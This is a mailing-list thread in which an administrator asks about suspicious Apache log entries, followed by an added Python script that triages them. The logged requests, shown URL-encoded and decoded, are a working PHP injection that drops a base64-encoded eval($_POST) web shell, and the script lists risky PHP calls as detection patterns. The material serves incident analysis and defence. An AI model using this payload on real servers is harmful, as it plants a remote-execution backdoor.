Actually, now that I re-read the requests, it also looks like a successful shellshock attempt.
Operating system software not updated recently either?

2017-02-06 17:42 GMT+01:00 Daniel <dferra...@gmail.com>:

> Have you tried to send those requests yourself and see what you get?
>
> Still those requests seem to be aimed at your php framework.
>
> Do you use a very old php version as well?
>
> 2017-02-06 17:41 GMT+01:00 Lentes, Bernd <bernd.lentes@helmholtz-muenchen.de>:
>
>> ----- On Feb 6, 2017, at 5:14 PM, Bernd Lentes bernd.lentes@helmholtz-muenchen.de wrote:
>>
>> > Hi,
>> >
>> > just in the moment I found two very weird entries in my access_log:
>> >
>> > 91.200.12.33 - - [06/Feb/2017:16:43:26 +0100] 236 "GET /?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUMENT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B HTTP/1.1" 200 90
>> > 91.200.12.33 - - [06/Feb/2017:16:44:33 +0100] 253 "GET /?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUMENT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B HTTP/1.1" 200 90
>> >
>> > What upsets me is that these two requests have status code 200, which means it was successful.
>> > The IP is from Ukraine. Where can I find out what these % characters mean? Does anyone understand what happened here? It's apache 2.2.3 64bit.
>> >
>> > Thanks for any hint.
>> >
>> > Bernd
>>
>> What I found out already:
>> https://url-encoder.de/ helped me to decode the URL:
>> /?1=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo '->|';file_put_contents($_SERVER['DOCUMENT_ROOT'].'/webconfig.txt.php',base64_decode('PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+'));echo '|<-';
>>
>> Currently I don't understand what this means.
>> I don't find a file webconfig.txt.php on my system.
>> Currently no weird process, no new user in /etc/passwd, no packets to the network which include this IP.
>>
>> Thankful for any tip.
>>
>> Bernd

--
*Daniel Ferradal*
IT Specialist

email dferradal at gmail.com
linkedin es.linkedin.com/in/danielferradal
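
Added example, not part of any message in this thread: a Python triage of the logged request that percent-decodes the query, lists the PHP calls it contains, the file it tries to write, and the decoded base64 argument. The regular expressions and the `triage` function are assumptions of this example; the sample is the first quoted access_log entry, re-joined.

```python
import base64
import re
from urllib.parse import unquote_plus, urlsplit

# Sample input: the first wrapped access_log entry quoted in the thread, re-joined.
SAMPLE = (
    '91.200.12.33 - - [06/Feb/2017:16:43:26 +0100] 236 "GET '
    "/?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B"
    "%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28"
    "%24_SERVER%5B%27DOCUMENT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28"
    "%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B "
    'HTTP/1.1" 200 90'
)

REQUEST = re.compile(r'"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
# Heuristic list (an assumption of this example): PHP calls worth flagging in a query.
PHP_CALL = re.compile(r"\b(eval|assert|file_put_contents|base64_decode|ini_set|set_time_limit)\s*\(")
WRITTEN_FILE = re.compile(r"file_put_contents\([^,]*?'([^']+)'\s*,")
B64_ARG = re.compile(r"base64_decode\(\s*['\"]([A-Za-z0-9+/=]+)['\"]")


def triage(line):
    """Decode one access_log line; return None if it holds no parsable request."""
    m = REQUEST.search(line)
    if m is None:
        return None
    # unquote_plus mirrors how PHP decodes a query string ('+' and %XX).
    query = unquote_plus(urlsplit(m["target"]).query)
    payloads = []
    for blob in B64_ARG.findall(query):
        try:
            payloads.append(base64.b64decode(blob, validate=True).decode("utf-8", "replace"))
        except ValueError:
            payloads.append("<invalid base64>")
    return {
        "status": int(m["status"]),
        "query": query,
        "php_calls": sorted(set(PHP_CALL.findall(query))),
        "written_files": WRITTEN_FILE.findall(query),
        "decoded_payloads": payloads,
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE).items():
        print(f"{key}: {value}")
```

The 200 status shows only that Apache answered the request for `/`; whether the parameter was ever evaluated is checked on the host, starting with the path reported under `written_files`.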